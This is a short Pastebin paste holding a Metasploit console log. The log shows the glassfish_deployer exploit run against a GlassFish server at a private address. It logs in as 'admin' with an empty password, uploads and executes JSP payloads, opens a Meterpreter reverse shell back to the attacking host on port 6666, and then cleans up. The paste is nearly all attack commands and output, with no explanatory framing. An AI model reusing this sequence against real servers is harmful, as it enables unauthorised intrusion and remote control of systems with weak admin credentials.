Advertisement
Guest User

Untitled

a guest
Jul 29th, 2017
66
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.88 KB | None | 0 0
  1. msf exploit(glassfish_deployer) > set target 0
  2. target => 0
  3. msf exploit(glassfish_deployer) > exploit -j
  4. [*] Exploit running as background job.
  5.  
  6. [*] Started reverse handler on 10.0.0.104:6666
  7. [*] 10.0.0.112 - GlassFish Enterprise Server - Trying username:'admin' with password:''
  8. msf exploit(glassfish_deployer) > [+] 10.0.0.112 - GlassFish Enterprise Server - SUCCESSFUL login for 'admin' : ''
  9. [*] Attempting to automatically select a target...
  10. [*] Automatically selected target "Windows Universal"
  11. [*] Successfully uploaded
  12. [*] Executing /hxw33ENqIzV/nrqL2Ct0.jsp...
  13. [*] Sending stage (749056 bytes) to 10.0.0.112
  14. [*] Meterpreter session 1 opened (10.0.0.104:6666 -> 10.0.0.112:4383) at Tue Mar 01 01:02:57 -0500 2011
  15. [*] Executing /hxw33ENqIzV/XWy63KUbpo2fNV1Gv.jsp...
  16. [*] GlassFish Application cleanup complete.
  17. [*] Executing /hxw33ENqIzV/cleanup.jsp...
  18. [*] JSP cleanup complete.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement